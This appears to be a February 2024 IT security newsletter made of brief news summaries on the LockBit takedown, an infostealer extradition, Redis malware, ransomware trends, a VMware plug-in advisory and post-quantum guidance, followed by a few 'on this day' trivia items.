IT Security Newsletter

IT Security Newsletter - 2/21/2024

Written by Cadre | Wed, Feb 21, 2024

Law enforcement trolls LockBit, reveals massive takedown

In an act of exquisite trolling, the UK's National Crime Agency (NCA) has announced further details about its disruption of the LockBit ransomware group by using the group's own dark web website. Since the demise of Conti in 2022, LockBit has been unchallenged as the most prolific ransomware group in the world. In the last 12 months it has racked up more than two and half times as many known attacks as its closest rival. READ MORE...

Alleged Raccoon Infostealer operator extradited, verification site set up for victims

A Ukrainian national was extradited to the United States from the Netherlands after being indicted for crimes related to fraud, money laundering, and aggravated identity theft. According to court documents, Mark Sokolovsky conspired to operate the Raccoon Infostealer as a malware-as-a-service or "MaaS." Individuals who deployed Raccoon Infostealer to steal data from victims leased access to the malware for approximately $200 per month, paid for by cryptocurrency. READ MORE...

Redis Servers Targeted With New 'Migo' Malware

Redis servers are being targeted with new malware that deploys a user mode rootkit and cryptocurrency miners, cloud forensics and incident response firm Cado reports. As part of the observed attacks, threat actors execute a series of commands on the victim Redis servers to disable configuration options and weaken the target before deploying the malicious payload. The primary payload in these attacks is a piece of malware dubbed 'Migo', which is written in the Golang programming language. READ MORE...

Median Ransomware Demands Grow to $600K a Pop

When it comes to ransomware attacks, median initial ransom demands for 2023 spiked 20% year-over-year to reach $600,000, with some sectors hit much worse than that: The legal, government, retail, and energy industries are now routinely seeing median demands of $1 million or more. That's according to Arctic Wolf, whose annual cybercrime report out this week shows that manufacturing-vertical victims showed up in 708 posts on various leak sites, making it the most represented industry. READ MORE...

Knight ransomware source code for sale after leak site shuts down

The alleged source code for the third iteration of the Knight ransomware is being offered for sale to a single buyer on a hacker forum by a representative of the operation. Knight ransomware launched at the end of July 2023 as a re-brand of the Cyclops operation, targeting Windows, macOS, and Linux/ESXi systems. It gained some traction because it provided info-stealers and a 'lite' version of its encryptor for lower-tier affiliates that attacked smaller organizations. READ MORE...

Library Cyber Defenses Are Falling Down

In an age where digital warfare and cyber espionage have become commonplace, institutions such as libraries and museums are locked in an asymmetrical battle against well-resourced adversaries. The massive ransomware attack on the British Library last October should be ringing alarm bells for knowledge repositories around the world. The Rhysida ransomware group is believed to be behind the attack, where attackers stole user data and employee information. READ MORE...

Active Directory outages can cost organizations $100,000 per day

Nearly every organization has core systems services tied to Active Directory that will go down during an outage, according to Cayosoft. The impact of just one system being down can devastate business operations and cause significant financial and operational losses, from preventing customer purchases and supplier communications to disrupting core functions, such as email access and device logins. READ MORE...

Executive Order on Port Cybersecurity Points to IT/OT Threat Posed by Chinese Cranes

The White House announced on Wednesday that the Biden-Harris administration is issuing an executive order to boost the cybersecurity of US ports, highlighting the risks posed by the use of cranes made by China. Ports, vessels, shipping companies, and other entities in the maritime sector are regularly impacted by cyber incidents, as shown by the maritime cyberattack database launched last year by a Dutch University. READ MORE...

VMware urges admins to remove deprecated, vulnerable auth plug-in

VMware urged admins today to remove a discontinued authentication plugin exposed to authentication relay and session hijack attacks in Windows domain environments via two security vulnerabilities left unpatched. The vulnerable VMware Enhanced Authentication Plug-in (EAP) enables seamless login to vSphere's management interfaces via integrated Windows Authentication and Windows-based smart card functionality on Windows client systems. READ MORE...

Singapore's monetary authority advises banks to get busy protecting against quantum decryption

The Monetary Authority of Singapore (MAS) advised on Monday that financial institutions need to stay agile enough to adopt post-quantum cryptography (PQC) and quantum key distribution (QKD) technology, without significantly impacting systems as part of cyber security measures. "Leading experts forecast that cyber security risks associated with quantum will materialize in the coming decade," reasoned [PDF] the MAS. READ MORE...

  • ...in 1946, actor Alan Rickman ("Die Hard", "Harry Potter") is born in London, England.
  • ...in 1972, US President Richard Nixon visits the People's Republic of China, opening diplomatic relations between the two nations.
  • ...in 1979, comedian and filmmaker Jordan Peele ("Key & Peele", "Get Out") is born in New York City.
  • ...in 1995, adventurer Steve Fossett lands in Saskatchewan, Canada, becoming the first person to complete a solo balloon flight across the Pacific Ocean.